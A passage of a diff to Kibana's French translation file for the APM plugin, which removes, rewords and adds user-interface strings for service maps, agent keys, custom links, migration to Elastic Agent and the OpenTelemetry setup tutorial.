- "xpack.apm.serviceGroups.tour.content.link": "Découvrez plus d'informations dans le {docsLink}.",
 "xpack.apm.serviceGroups.tour.content.link.docs": "documents",
 "xpack.apm.serviceGroups.tour.createGroups.content": "Regroupez les services afin de créer des vues d'inventaire organisées qui éliminent le bruit et simplifient les enquêtes sur les services. Les groupes sont spécifiques à l'espace Kibana et sont disponibles pour tous les utilisateurs ayant un accès approprié.",
 "xpack.apm.serviceGroups.tour.createGroups.title": "Présentation des groupes de services",
@@ -7962,13 +7246,8 @@
 "xpack.apm.serviceIcons.container": "Conteneur",
 "xpack.apm.serviceIcons.serverless": "Sans serveur",
 "xpack.apm.serviceIcons.service": "Service",
- "xpack.apm.serviceIcons.serviceDetails.cloud.availabilityZoneLabel": "{zones, plural, =0 {Zone de disponibilité} one {Zone de disponibilité} other {Zones de disponibilité}} ",
- "xpack.apm.serviceIcons.serviceDetails.cloud.faasTriggerTypeLabel": "{triggerTypes, plural, =0 {Type de déclencheur} one {Type de déclencheur} other {Types de déclencheurs}} ",
- "xpack.apm.serviceIcons.serviceDetails.cloud.functionNameLabel": "{functionNames, plural, =0 {Nom de fonction} one {Nom de fonction} other {Noms de fonction}} ",
- "xpack.apm.serviceIcons.serviceDetails.cloud.machineTypesLabel": "{machineTypes, plural, =0{Type de machine} one {Type de machine} other {Types de machines}} ",
- "xpack.apm.serviceIcons.serviceDetails.cloud.projectIdLabel": "ID projet",
+ "xpack.apm.serviceIcons.serviceDetails.cloud.projectIdLabel": "ID de projet",
 "xpack.apm.serviceIcons.serviceDetails.cloud.providerLabel": "Fournisseur cloud",
- "xpack.apm.serviceIcons.serviceDetails.cloud.regionLabel": "{regions, plural, =0 {Region} one {Région} other {Régions}} ",
 "xpack.apm.serviceIcons.serviceDetails.cloud.serviceNameLabel": "Service Cloud",
 "xpack.apm.serviceIcons.serviceDetails.container.containerizedLabel": "Conteneurisé",
 "xpack.apm.serviceIcons.serviceDetails.container.noLabel": "Non",
@@ -7986,7 +7265,7 @@
 "xpack.apm.serviceMap.anomalyDetectionPopoverNoData": "Nous n'avons pas trouvé de score d'anomalie dans la plage temporelle sélectionnée. Consultez les détails dans l'explorateur d'anomalies.",
 "xpack.apm.serviceMap.anomalyDetectionPopoverScoreMetric": "Score (max.)",
 "xpack.apm.serviceMap.anomalyDetectionPopoverTitle": "Détection des anomalies",
- "xpack.apm.serviceMap.anomalyDetectionPopoverTooltip": "Les indicateurs d'intégrité du service sont soutenus par la fonctionnalité de détection des anomalies dans le Machine Learning",
+ "xpack.apm.serviceMap.anomalyDetectionPopoverTooltip": "Les indicateurs d'intégrité du service sont soutenus par la fonctionnalité de détection des anomalies dans le Machine Learning",
 "xpack.apm.serviceMap.avgCpuUsagePopoverStat": "Utilisation CPU (moy.)",
 "xpack.apm.serviceMap.avgMemoryUsagePopoverStat": "Utilisation de la mémoire (moy.)",
 "xpack.apm.serviceMap.avgReqPerMinutePopoverMetric": "Rendement (moy.)",
@@ -7999,11 +7278,10 @@
 "xpack.apm.serviceMap.emptyBanner.title": "Il semblerait qu'il n'y ait qu'un seul service.",
 "xpack.apm.serviceMap.errorRatePopoverStat": "Taux de transactions ayant échoué (moy.)",
 "xpack.apm.serviceMap.focusMapButtonText": "Centrer la carte",
- "xpack.apm.serviceMap.invalidLicenseMessage": "Pour accéder aux cartes de service, vous devez disposer d'une licence Elastic Platinum. Elle vous permettra de visualiser l'intégralité de la suite d'applications ainsi que vos données APM.",
+ "xpack.apm.serviceMap.invalidLicenseMessage": "Pour accéder aux cartes de service, vous devez disposer d'une licence Elastic Platinum. Elle vous permettra de visualiser l'intégralité de la suite d'applications ainsi que vos données APM.",
 "xpack.apm.serviceMap.noServicesPromptDescription": "Nous ne parvenons pas à trouver des services à mapper dans la plage temporelle et l'environnement actuellement sélectionnés. Veuillez essayer une autre plage ou vérifier l'environnement sélectionné. Si vous ne disposez d'aucun service, utilisez nos instructions de configuration pour vous aider à vous lancer.",
 "xpack.apm.serviceMap.noServicesPromptTitle": "Aucun service disponible",
 "xpack.apm.serviceMap.popover.noDataText": "Aucune donnée pour l'environnement sélectionné. Essayez de passer à un autre environnement.",
- "xpack.apm.serviceMap.resourceCountLabel": "{count} ressources",
 "xpack.apm.serviceMap.serviceDetailsButtonText": "Détails du service",
 "xpack.apm.serviceMap.subtypePopoverStat": "Sous-type",
 "xpack.apm.serviceMap.timeoutPrompt.docsLink": "En savoir plus sur les paramètres APM dans la documentation",
@@ -8020,7 +7298,6 @@
 "xpack.apm.serviceNodeMetrics.host": "Hôte",
 "xpack.apm.serviceNodeMetrics.serviceName": "Nom de service",
 "xpack.apm.serviceNodeMetrics.unidentifiedServiceNodesWarningDocumentationLink": "documentation du serveur APM",
- "xpack.apm.serviceNodeMetrics.unidentifiedServiceNodesWarningText": "Nous n'avons pas pu déterminer à quelles JVM ces indicateurs correspondent. Cela provient probablement du fait que vous exécutez une version du serveur APM antérieure à 7.5. La mise à niveau du serveur APM vers la version 7.5 ou supérieure devrait résoudre le problème. Pour plus d'informations sur la mise à niveau, consultez {link}. Vous pouvez également utiliser la barre de recherche de Kibana pour filtrer par nom d'hôte, par ID de conteneur ou en fonction d'autres champs.",
 "xpack.apm.serviceNodeMetrics.unidentifiedServiceNodesWarningTitle": "Impossible d'identifier les JVM",
 "xpack.apm.serviceNodeNameMissing": "(vide)",
 "xpack.apm.serviceOverview.coldstartHelp": "Le taux de démarrage à froid indique le pourcentage de demandes qui déclenchent un démarrage à froid d'une fonction sans serveur.",
@@ -8080,10 +7357,9 @@
 "xpack.apm.servicesGroups.filter": "Groupes de filtres",
 "xpack.apm.servicesGroups.loadingServiceGroups": "Chargement des groupes de services",
 "xpack.apm.servicesTable.environmentColumnLabel": "Environnement",
- "xpack.apm.servicesTable.environmentCount": "{environmentCount, plural, one {1 environnement} other {# environnements}}",
 "xpack.apm.servicesTable.healthColumnLabel": "Intégrité",
 "xpack.apm.servicesTable.latencyAvgColumnLabel": "Latence (moy.)",
- "xpack.apm.servicesTable.metricsExplanationLabel": "Que sont ces indicateurs ?",
+ "xpack.apm.servicesTable.metricsExplanationLabel": "Que sont ces indicateurs ?",
 "xpack.apm.servicesTable.nameColumnLabel": "Nom",
 "xpack.apm.servicesTable.notFoundLabel": "Aucun service trouvé",
 "xpack.apm.servicesTable.throughputColumnLabel": "Rendement",
@@ -8096,21 +7372,18 @@
 "xpack.apm.settings.agentKeys": "Clés d'agent",
 "xpack.apm.settings.agentKeys.agentKeysErrorPromptTitle": "Impossible de charger les clés de l'agent APM.",
 "xpack.apm.settings.agentKeys.agentKeysLoadingPromptTitle": "Chargement des clés de l'agent APM...",
- "xpack.apm.settings.agentKeys.apiKeysDisabledErrorDescription": "Contactez votre administrateur système et reportez-vous aux {link} pour activer les clés d'API.",
 "xpack.apm.settings.agentKeys.apiKeysDisabledErrorLinkText": "documents",
 "xpack.apm.settings.agentKeys.apiKeysDisabledErrorTitle": "Clés d'API non activées dans Elasticsearch",
 "xpack.apm.settings.agentKeys.copyAgentKeyField.agentKeyLabel": "Clé de l'agent APM",
 "xpack.apm.settings.agentKeys.copyAgentKeyField.copyButton": "Copier dans le presse-papiers",
 "xpack.apm.settings.agentKeys.copyAgentKeyField.message": "Copiez cette clé maintenant. Vous ne pourrez plus la visualiser à nouveau.",
- "xpack.apm.settings.agentKeys.copyAgentKeyField.title": "Création de la clé \"{name}\" effectuée",
- "xpack.apm.settings.agentKeys.crate.failed": "Erreur lors de la création de la clé de l'agent APM \"{keyName}\". 
Erreur : \"{message}\"",
 "xpack.apm.settings.agentKeys.createAgentKeyButton": "Créer une clé d'agent APM",
 "xpack.apm.settings.agentKeys.createKeyFlyout.agentConfigHelpText": "Requis pour que les agents puissent lire la configuration des agents à distance.",
 "xpack.apm.settings.agentKeys.createKeyFlyout.cancelButton": "Annuler",
 "xpack.apm.settings.agentKeys.createKeyFlyout.createAgentKey": "Créer une clé d'agent APM",
 "xpack.apm.settings.agentKeys.createKeyFlyout.ingestAgentEvents": "Requis pour l'ingestion d'événements.",
 "xpack.apm.settings.agentKeys.createKeyFlyout.name.placeholder": "Entrer un nom",
- "xpack.apm.settings.agentKeys.createKeyFlyout.nameHelpText": "Quelle est l'utilisation de cette clé ?",
+ "xpack.apm.settings.agentKeys.createKeyFlyout.nameHelpText": "Quelle est l'utilisation de cette clé ?",
 "xpack.apm.settings.agentKeys.createKeyFlyout.namePlaceholder": "Par exemple, apm-key",
 "xpack.apm.settings.agentKeys.createKeyFlyout.nameTitle": "Nom",
 "xpack.apm.settings.agentKeys.createKeyFlyout.privilegesFieldset": "Attribuer des privilèges",
@@ -8118,12 +7391,9 @@
 "xpack.apm.settings.agentKeys.createKeyFlyout.userTitle": "Utilisateur",
 "xpack.apm.settings.agentKeys.deleteConfirmModal.cancel": "Annuler",
 "xpack.apm.settings.agentKeys.deleteConfirmModal.delete": "Supprimer",
- "xpack.apm.settings.agentKeys.deleteConfirmModal.title": "Supprimer la clé de l'agent APM \"{name}\" ?",
 "xpack.apm.settings.agentKeys.descriptionText": "Afficher et supprimer les clés de l'agent APM. Une clé de l'agent APM envoie des demandes de la part d'un utilisateur.",
 "xpack.apm.settings.agentKeys.emptyPromptBody": "Créez des clés d'agent APM pour autoriser les demandes d'agent APM au serveur APM.",
 "xpack.apm.settings.agentKeys.emptyPromptTitle": "Créer votre première clé",
- "xpack.apm.settings.agentKeys.invalidate.failed": "Erreur lors de la suppression de la clé de l'agent APM \"{name}\"",
- "xpack.apm.settings.agentKeys.invalidate.succeeded": "Suppression de la clé de l'agent APM \"{name}\"",
 "xpack.apm.settings.agentKeys.noPermissionToManagelApiKeysDescription": "Contactez votre administrateur système",
 "xpack.apm.settings.agentKeys.noPermissionToManagelApiKeysTitle": "Vous devez disposer d'une autorisation pour gérer les clés d'API",
 "xpack.apm.settings.agentKeys.table.creationColumnName": "Créé",
@@ -8153,44 +7423,38 @@
 "xpack.apm.settings.anomalyDetection.jobList.failedFetchText": "Impossible de récupérer les tâches de détection des anomalies.",
 "xpack.apm.settings.anomalyDetection.jobList.legacyStatusLabel": "Hérité",
 "xpack.apm.settings.anomalyDetection.jobList.manageMlJobsButtonText": "Gérer les tâches",
- "xpack.apm.settings.anomalyDetection.jobList.mlDescriptionText": "Pour ajouter la détection des anomalies à un nouvel environnement, créez une tâche de Machine Learning. Vous pouvez gérer les tâches de Machine Learning existantes dans {mlJobsLink}.",
 "xpack.apm.settings.anomalyDetection.jobList.mlDescriptionText.mlJobsLinkText": "Machine Learning",
 "xpack.apm.settings.anomalyDetection.jobList.mlJobLinkText": "Gérer la tâche",
 "xpack.apm.settings.anomalyDetection.jobList.okStatusLabel": "OK",
- "xpack.apm.settings.anomalyDetection.jobList.openAnomalyExplorerrLinkText": "Ouvrir dans Anomaly Explorer",
+ "xpack.apm.settings.anomalyDetection.jobList.openAnomalyExplorerrLinkText": "Ouvrir dans Anomaly Explorer",
 "xpack.apm.settings.anomalyDetection.jobList.showLegacyJobsCheckboxText": "Afficher les tâches héritées",
 "xpack.apm.settings.anomalyDetection.jobList.warningStatusBadgeLabel": "Avertissement",
 "xpack.apm.settings.anomalyDetection.jobList.warningStatusLabel": "Il est possible que la tâche rencontre des problèmes. Cliquez sur le lien Gérer les tâches pour en savoir plus.",
 "xpack.apm.settings.apmIndices.applyButton": "Appliquer les modifications",
- "xpack.apm.settings.apmIndices.applyChanges.failed.text": "Un problème est survenu lors de l'application des index. Erreur : {errorMessage}",
 "xpack.apm.settings.apmIndices.applyChanges.failed.title": "Impossible d'appliquer les index.",
 "xpack.apm.settings.apmIndices.applyChanges.succeeded.text": "Les modifications apportées aux index ont été correctement appliquées. 
Ces modifications sont immédiatement appliquées dans l'interface utilisateur APM",
 "xpack.apm.settings.apmIndices.applyChanges.succeeded.title": "Index appliqués",
 "xpack.apm.settings.apmIndices.cancelButton": "Annuler",
 "xpack.apm.settings.apmIndices.description": "L'interface utilisateur APM utilise des vues de données pour interroger vos indices APM. Si vous avez personnalisé les noms des index sur lesquels le serveur APM écrit les événements, vous devrez peut-être mettre à jour ces modèles pour que l'interface utilisateur APM fonctionne. Dans ce cas précis, les paramètres prévalent sur ceux définis dans kibana.yml.",
 "xpack.apm.settings.apmIndices.errorIndicesLabel": "Index des erreurs",
- "xpack.apm.settings.apmIndices.helpText": "Remplace {configurationName} : {defaultValue}",
 "xpack.apm.settings.apmIndices.metricsIndicesLabel": "Index des indicateurs",
 "xpack.apm.settings.apmIndices.noPermissionTooltipLabel": "Votre rôle d'utilisateur ne dispose pas d'autorisations pour changer les index APM",
 "xpack.apm.settings.apmIndices.onboardingIndicesLabel": "Intégration des index",
 "xpack.apm.settings.apmIndices.sourcemapIndicesLabel": "Index des source maps",
- "xpack.apm.settings.apmIndices.spaceDescription": "Les paramètres des index s'appliquent à l'espace {spaceName}.",
 "xpack.apm.settings.apmIndices.spanIndicesLabel": "Index des intervalles",
 "xpack.apm.settings.apmIndices.title": "Index",
 "xpack.apm.settings.apmIndices.transactionIndicesLabel": "Index des transactions",
 "xpack.apm.settings.createApmPackagePolicy.errorToast.title": "Impossible de créer une politique de package APM sur la politique d'agent cloud",
 "xpack.apm.settings.customizeApp": "Liens personnalisés",
 "xpack.apm.settings.customLink": "Liens personnalisés",
- "xpack.apm.settings.customLink.create.failed": "Impossible d'enregistrer le lien !",
- "xpack.apm.settings.customLink.create.failed.message": "Un problème est survenu lors de l'enregistrement du lien. 
Erreur : \"{errorMessage}\"",
- "xpack.apm.settings.customLink.create.successed": "Lien enregistré !",
+ "xpack.apm.settings.customLink.create.failed": "Impossible d'enregistrer le lien !",
+ "xpack.apm.settings.customLink.create.successed": "Lien enregistré !",
 "xpack.apm.settings.customLink.createCustomLink": "Créer un lien personnalisé",
 "xpack.apm.settings.customLink.default.label": "Elastic.co",
 "xpack.apm.settings.customLink.default.url": "https://www.elastic.co",
 "xpack.apm.settings.customLink.delete": "Supprimer",
 "xpack.apm.settings.customLink.delete.failed": "Impossible de supprimer le lien personnalisé",
 "xpack.apm.settings.customLink.delete.successed": "Lien personnalisé supprimé.",
- "xpack.apm.settings.customLink.emptyPromptText": "Nous allons y remédier ! Vous pouvez ajouter des liens personnalisés au menu Actions à partir des détails de transaction de chaque service. Créez un lien utile vers le portail d'assistance de votre société, ou ouvrez un rapport de bug. Besoin d'autres idées ? Consultez {customLinkDocLinkText}.",
 "xpack.apm.settings.customLink.emptyPromptText.customLinkDocLinkText": "documents",
 "xpack.apm.settings.customLink.emptyPromptTitle": "Aucun lien trouvé.",
 "xpack.apm.settings.customLink.flyout.action.title": "Lien",
@@ -8208,17 +7472,15 @@
 "xpack.apm.settings.customLink.flyout.link.label.placeholder": "Par ex., tickets d'assistance",
 "xpack.apm.settings.customLink.flyout.link.url": "URL",
 "xpack.apm.settings.customLink.flyout.link.url.doc": "Découvrez plus d'informations dans la documentation.",
- "xpack.apm.settings.customLink.flyout.link.url.helpText": "Ajoutez les variables des noms de champ à votre URL pour appliquer des valeurs, par ex., {sample}.",
 "xpack.apm.settings.customLink.flyout.link.url.placeholder": "par ex., https://www.elastic.co/fr/",
 "xpack.apm.settings.customLink.flyout.required": "Requis",
 "xpack.apm.settings.customLink.flyout.save": "Enregistrer",
 "xpack.apm.settings.customLink.flyout.title": "Créer un lien",
 "xpack.apm.settings.customLink.info": "Ces liens seront affichés dans le menu contextuel Actions, dans des zones sélectionnées de l'application, par ex., par détail de transaction.",
- "xpack.apm.settings.customLink.license.text": "Pour créer des liens personnalisés, vous devez disposer d'une licence Elastic Gold ou supérieure. Elle vous permet de créer des liens personnalisés pour améliorer votre workflow lors de l'analyse de vos services.",
+ "xpack.apm.settings.customLink.license.text": "Pour créer des liens personnalisés, vous devez disposer d'une licence Elastic Gold ou supérieure. 
Elle vous permet de créer des liens personnalisés pour améliorer votre workflow lors de l'analyse de vos services.",
 "xpack.apm.settings.customLink.linkPreview.descrition": "Testez votre lien avec des valeurs tirées d'un document d'exemple de transaction avec les filtres ci-dessus.",
 "xpack.apm.settings.customLink.noPermissionTooltipLabel": "Votre rôle d'utilisateur ne dispose pas d'autorisations pour créer des liens personnalisés",
 "xpack.apm.settings.customLink.preview.contextVariable.invalid": "Nous n'avons pas trouvé de document d'exemple de transaction car les variables définies ne sont pas valides.",
- "xpack.apm.settings.customLink.preview.contextVariable.noMatch": "Nous n'avons pas trouvé de valeur correspondante pour {variables} dans le document d'exemple de transaction.",
 "xpack.apm.settings.customLink.preview.transaction.notFound": "Nous n'avons pas trouvé de document de transaction correspondant avec les filtres définis.",
 "xpack.apm.settings.customLink.previewSectionTitle": "Aperçu",
 "xpack.apm.settings.customLink.searchInput.filter": "Filtrer les liens par nom et URL…",
@@ -8226,7 +7488,6 @@
 "xpack.apm.settings.customLink.table.editButtonLabel": "Modifier",
 "xpack.apm.settings.customLink.table.lastUpdated": "Dernière mise à jour",
 "xpack.apm.settings.customLink.table.name": "Nom",
- "xpack.apm.settings.customLink.table.noResultFound": "Pas de résultats pour \"{value}\".",
 "xpack.apm.settings.customLink.table.url": "URL",
 "xpack.apm.settings.indices": "Index",
 "xpack.apm.settings.schema": "Schéma",
@@ -8239,11 +7500,9 @@
 "xpack.apm.settings.schema.confirm.title": "Veuillez confirmer votre choix",
 "xpack.apm.settings.schema.confirm.unsupportedConfigs.descriptionText": "Les paramètres utilisateur apm-server.yml personnalisés compatibles seront déplacés vers le serveur Fleet à votre place. Nous vous informerons des paramètres incompatibles avant de les supprimer.",
 "xpack.apm.settings.schema.confirm.unsupportedConfigs.title": "Les paramètres utilisateur apm-server.yml suivants sont incompatibles et seront supprimés",
- "xpack.apm.settings.schema.descriptionText": "Nous avons créé un processus simple et transparent pour passer du binaire du serveur APM à Elastic Agent. Attention, il s'agit d'une action {irreversibleEmphasis} qui ne peut être réalisée que par un {superuserEmphasis} bénéficiant d'un accès à Fleet. En savoir plus sur {elasticAgentDocLink}.",
- "xpack.apm.settings.schema.descriptionText.elasticAgentDocLinkText": "Elastic Agent",
+ "xpack.apm.settings.schema.descriptionText.elasticAgentDocLinkText": "Elastic Agent",
 "xpack.apm.settings.schema.descriptionText.irreversibleEmphasisText": "irréversible",
 "xpack.apm.settings.schema.descriptionText.superuserEmphasisText": "superutilisateur",
- "xpack.apm.settings.schema.disabledReason": "L'option Passer à Elastic Agent n'est pas disponible : {reasons}",
 "xpack.apm.settings.schema.disabledReason.cloudApmMigrationEnabled": "La migration vers le cloud n'est pas activée",
 "xpack.apm.settings.schema.disabledReason.hasCloudAgentPolicy": "La politique d'agent cloud n'existe pas",
 "xpack.apm.settings.schema.disabledReason.hasRequiredRole": "L'utilisateur ne dispose pas du rôle de superutilisateur",
@@ -8252,26 +7511,22 @@
 "xpack.apm.settings.schema.migrate.classicIndices.title": "Binaire du serveur APM",
 "xpack.apm.settings.schema.migrate.dataStreams.buttonText": "Passer à Elastic Agent",
 "xpack.apm.settings.schema.migrate.dataStreams.description": "À partir de la version 8.0, il est recommandé de gérer le serveur APM avec Elastic Agent. Elastic Agent peut fonctionner sur notre service hébergé Elasticsearch, ECE, ou être autogéré. Ensuite, ajoutez l'intégration Elastic APM pour continuer à ingérer des données APM.",
- "xpack.apm.settings.schema.migrate.dataStreams.title": "Elastic Agent",
+ "xpack.apm.settings.schema.migrate.dataStreams.title": "Elastic Agent",
 "xpack.apm.settings.schema.migrationInProgressPanelDescription": "Nous créons actuellement une instance de serveur Fleet pour contenir le nouveau serveur APM pendant la fermeture de l'ancienne instance du serveur APM. Dans quelques minutes, vous devriez voir vos données réintégrer l'application.",
 "xpack.apm.settings.schema.migrationInProgressPanelTitle": "En cours de transition vers Elastic Agent...",
 "xpack.apm.settings.schema.success.description": "Votre intégration APM est à présent configurée et prête à recevoir des données de vos agents actuellement instrumentés. 
N'hésitez pas à consulter les politiques appliquées à votre intégration.",
- "xpack.apm.settings.schema.success.returnText": "ou revenez simplement à l'{serviceInventoryLink}.",
 "xpack.apm.settings.schema.success.returnText.serviceInventoryLink": "Inventaire de service",
- "xpack.apm.settings.schema.success.title": "Elastic Agent a bien été configuré !",
+ "xpack.apm.settings.schema.success.title": "Elastic Agent a bien été configuré !",
 "xpack.apm.settings.schema.success.viewIntegrationInFleet.buttonText": "Afficher l'intégration APM dans Fleet",
 "xpack.apm.settings.schema.upgradeAvailable.title": "Mise à niveau de l'intégration APM disponible !",
 "xpack.apm.settings.schema.upgradeAvailable.upgradePackagePolicyLink": "Mettre à niveau votre intégration APM",
 "xpack.apm.settings.title": "Paramètres",
 "xpack.apm.settings.unsupportedConfigs.errorToast.title": "Impossible de récupérer les paramètres du serveur APM",
- "xpack.apm.settings.upgradeAvailable.description": "Même si votre intégration APM est configurée, une nouvelle version de l'intégration APM est disponible pour une mise à niveau avec votre stratégie de package. Consultez {upgradePackagePolicyLink} pour tirer le meilleur parti de votre configuration.",
 "xpack.apm.settingsLinkLabel": "Paramètres",
 "xpack.apm.setupInstructionsButtonLabel": "Instructions de configuration",
 "xpack.apm.spanLinks.callout.description": "Un lien est un pointeur allant de l'intervalle actuel vers un autre intervalle de la même trace ou d'une trace différente. 
Par exemple, vous pouvez l'utiliser dans des opérations de mise en lots, où un gestionnaire de lot unique traite plusieurs requêtes de différentes traces ou lorsque le gestionnaire reçoit une requête d'un autre projet.",
 "xpack.apm.spanLinks.callout.dimissButton": "Rejeter",
 "xpack.apm.spanLinks.callout.title": "Liens d'intervalle",
- "xpack.apm.spanLinks.combo.childrenLinks": "Liens entrants ({linkedChildren})",
- "xpack.apm.spanLinks.combo.parentsLinks": "Liens sortants ({linkedParents})",
 "xpack.apm.spanLinks.table.actions.copyParentTraceId": "Copier l'ID de trace parente",
 "xpack.apm.spanLinks.table.actions.copySpanId": "Copier l'ID d'intervalle",
 "xpack.apm.spanLinks.table.actions.goToSpanDetails": "Accéder aux détails d'intervalle",
@@ -8281,7 +7536,6 @@
 "xpack.apm.spanLinks.table.span": "Intervalle",
 "xpack.apm.spanLinks.table.spanDuration": "Durée d'intervalle",
 "xpack.apm.stacktraceTab.causedByFramesToogleButtonLabel": "Provoqué par",
- "xpack.apm.stacktraceTab.libraryFramesToogleButtonLabel": "{count, plural, one {# cadre de bibliothèque} other {# cadres de bibliothèque}}",
 "xpack.apm.stacktraceTab.localVariablesToogleButtonLabel": "Variables locales",
 "xpack.apm.stacktraceTab.noStacktraceAvailableLabel": "Aucune trace de pile disponible.",
 "xpack.apm.technicalPreviewBadgeDescription": "Cette fonctionnalité est en version d'évaluation technique et pourra être modifiée ou retirée complètement dans une future version. Elastic s'efforcera au maximum de corriger tout problème, mais les fonctionnalités en version d'évaluation technique ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale.",
@@ -8332,9 +7586,8 @@
 "xpack.apm.transactionDetails.coldstartBadge": "démarrage à froid",
 "xpack.apm.transactionDetails.distribution.failedTransactionsLatencyDistributionErrorTitle": "Une erreur s'est produite lors de la récupération de la distribution de la latence des transactions ayant échoué.",
 "xpack.apm.transactionDetails.distribution.latencyDistributionErrorTitle": "Une erreur s'est produite lors de la récupération de la distribution de la latence globale.",
- "xpack.apm.transactionDetails.errorCount": "{errorCount, number} {errorCount, plural, one {erreur} other {erreurs}}",
 "xpack.apm.transactionDetails.noTraceParentButtonTooltip": "Le parent de la trace n'a pas pu être trouvé",
- "xpack.apm.transactionDetails.percentOfTraceLabelExplanation": "Le % de {parentType, select, transaction {transaction} trace {trace} } dépasse 100 %, car {childType, select, span {cet intervalle} transaction {cette transaction} } prend plus de temps que la transaction racine.",
+ "xpack.apm.transactionDetails.percentOfTraceLabelExplanation": "Le % de {parentType, select, transaction {transaction} trace {trace} } dépasse 100 %, car {childType, select, span {cet intervalle} transaction {cette transaction} } prend plus de temps que la transaction racine.",
 "xpack.apm.transactionDetails.requestMethodLabel": "Méthode de requête",
 "xpack.apm.transactionDetails.resultLabel": "Résultat",
 "xpack.apm.transactionDetails.serviceLabel": "Service",
@@ -8357,10 +7610,13 @@
 "xpack.apm.transactionDetails.tabs.failedTransactionsCorrelationsLabel": "Corrélations des transactions ayant échoué",
 "xpack.apm.transactionDetails.tabs.latencyLabel": "Corrélations de latence",
 "xpack.apm.transactionDetails.tabs.traceSamplesLabel": "Échantillons de traces",
+ "xpack.apm.transactionDetails.topErrors.errorMessage": "Impossible de récupérer les erreurs",
+ "xpack.apm.transactionDetails.topErrors.loading": "Chargement...",
+ "xpack.apm.transactionDetails.topErrors.noResults": "Aucune erreur trouvée pour ce groupe de transactions",
+ "xpack.apm.transactionDetails.topErrors.title": "5 principales erreurs",
 "xpack.apm.transactionDetails.traceNotFound": "La trace sélectionnée n'a pas pu être trouvée",
 "xpack.apm.transactionDetails.traceSampleTitle": "Échantillon de trace",
 "xpack.apm.transactionDetails.transactionLabel": "Transaction",
- "xpack.apm.transactionDetails.transFlyout.callout.agentDroppedSpansMessage": "L'agent APM qui a signalé cette transaction a abandonné {dropped} intervalles ou plus, d'après sa configuration.",
 "xpack.apm.transactionDetails.transFlyout.callout.learnMoreAboutDroppedSpansLinkText": "Découvrir plus d'informations sur les intervalles abandonnés.",
 "xpack.apm.transactionDetails.transFlyout.transactionDetailsTitle": "Détails de la transaction",
 "xpack.apm.transactionDetails.userAgentAndVersionLabel": "Agent utilisateur et version",
@@ -8378,11 +7634,9 @@
 "xpack.apm.transactionDurationLabel": "Durée",
 "xpack.apm.transactionErrorRateAlert.name": "Seuil du taux de transactions ayant échoué",
 "xpack.apm.transactionErrorRateAlertTrigger.isAbove": "est supérieur à",
- "xpack.apm.transactionRateLabel": "{displayedValue} tpm",
 "xpack.apm.transactions.latency.chart.95thPercentileLabel": "95e centile",
 "xpack.apm.transactions.latency.chart.99thPercentileLabel": "99e centile",
 "xpack.apm.transactions.latency.chart.averageLabel": "Moyenne",
- "xpack.apm.transactionsTable.cardinalityWarning.body": "Le nombre de noms de transactions uniques dépasse la valeur configurée de {bucketSize}. Essayez de reconfigurer vos agents de façon à regrouper les transactions similaires ou augmentez la valeur de {codeBlock}",
 "xpack.apm.transactionsTable.cardinalityWarning.docsLink": "En savoir plus dans la documentation",
 "xpack.apm.transactionsTable.cardinalityWarning.title": "Cette vue présente un sous-ensemble de transactions signalées.",
 "xpack.apm.transactionsTable.errorMessage": "Impossible de récupérer",
@@ -8402,140 +7656,117 @@ "xpack.apm.tutorial.apmAgents.statusCheck.text": "Vérifiez que votre application est en cours d'exécution et que les agents envoient les données.", "xpack.apm.tutorial.apmAgents.statusCheck.title": "Statut de l'agent", "xpack.apm.tutorial.apmAgents.title": "Agents APM", - "xpack.apm.tutorial.apmServer.callOut.message": "Assurez-vous de mettre à jour votre serveur APM vers la version 7.0 ou supérieure. Vous pouvez également migrer vos données 6.x à l'aide de l'assistant de migration disponible dans la section de gestion de Kibana.", - "xpack.apm.tutorial.apmServer.callOut.title": "Important : mise à niveau vers la version 7.0 ou supérieure", + "xpack.apm.tutorial.apmServer.callOut.message": "Assurez-vous de mettre à jour votre serveur APM vers la version 7.0 ou supérieure. Vous pouvez également migrer vos données 6.x à l'aide de l'assistant de migration disponible dans la section de gestion de Kibana.", + "xpack.apm.tutorial.apmServer.callOut.title": "Important : mise à niveau vers la version 7.0 ou supérieure", "xpack.apm.tutorial.apmServer.fleet.apmIntegration.button": "Intégration APM", "xpack.apm.tutorial.apmServer.fleet.apmIntegration.description": "Fleet vous permet de gérer de manière centralisée les agents Elastic qui exécutent l'intégration APM. L'option par défaut consiste à installer un serveur Fleet sur un hôte dédié. 
Pour les configurations sans hôte dédié, nous vous recommandons de suivre les instructions pour installer le serveur APM autonome pour votre système d'exploitation en sélectionnant l'onglet correspondant ci-dessus.", "xpack.apm.tutorial.apmServer.fleet.manageApmIntegration.button": "Gérer l'intégration APM dans Fleet", "xpack.apm.tutorial.apmServer.fleet.message": "L'intégration d'APM installe les modèles Elasticsearch et les pipelines d'ingestion pour les données APM.", - "xpack.apm.tutorial.apmServer.fleet.title": "Elastic APM est maintenant disponible dans Fleet !", + "xpack.apm.tutorial.apmServer.fleet.title": "Elastic APM est maintenant disponible dans Fleet !", "xpack.apm.tutorial.apmServer.statusCheck.btnLabel": "Vérifier le statut du serveur APM", - "xpack.apm.tutorial.apmServer.statusCheck.errorMessage": "Aucun serveur APM détecté. Vérifiez qu'il est en cours d'exécution et que vous avez effectué la mise à jour vers la version 7.0 ou supérieure.", + "xpack.apm.tutorial.apmServer.statusCheck.errorMessage": "Aucun serveur APM détecté. 
Vérifiez qu'il est en cours d'exécution et que vous avez effectué la mise à jour vers la version 7.0 ou supérieure.", "xpack.apm.tutorial.apmServer.statusCheck.successMessage": "Vous avez correctement configuré le serveur APM", "xpack.apm.tutorial.apmServer.statusCheck.text": "Vérifiez que le serveur APM est en cours d'exécution avant de commencer à mettre en œuvre les agents APM.", "xpack.apm.tutorial.apmServer.statusCheck.title": "Statut du serveur APM", - "xpack.apm.tutorial.apmServer.title": "Serveur APM", + "xpack.apm.tutorial.apmServer.title": "Serveur APM", + "xpack.apm.tutorial.config_otel.column.configSettings": "Paramètre de configuration (1)", + "xpack.apm.tutorial.config_otel.column.configValue": "Valeur de configuration", + "xpack.apm.tutorial.config_otel.column.notes": "Notes", + "xpack.apm.tutorial.config_otel.description2": "Les variables d’environnement 'OTEL_METRICS_EXPORTER` et 'OTEL_LOGS_EXPORTER' peuvent ne pas être prises en charge par certains SDK.", + "xpack.apm.tutorial.config_otel.instrumentationGuide": "Guide de l’Instrumentation OpenTelemetry", "xpack.apm.tutorial.djangoClient.configure.commands.addAgentComment": "Ajouter l'agent aux applications installées", - "xpack.apm.tutorial.djangoClient.configure.commands.addTracingMiddlewareComment": "Pour envoyer les indicateurs de performance, ajoutez notre intergiciel de traçage :", + 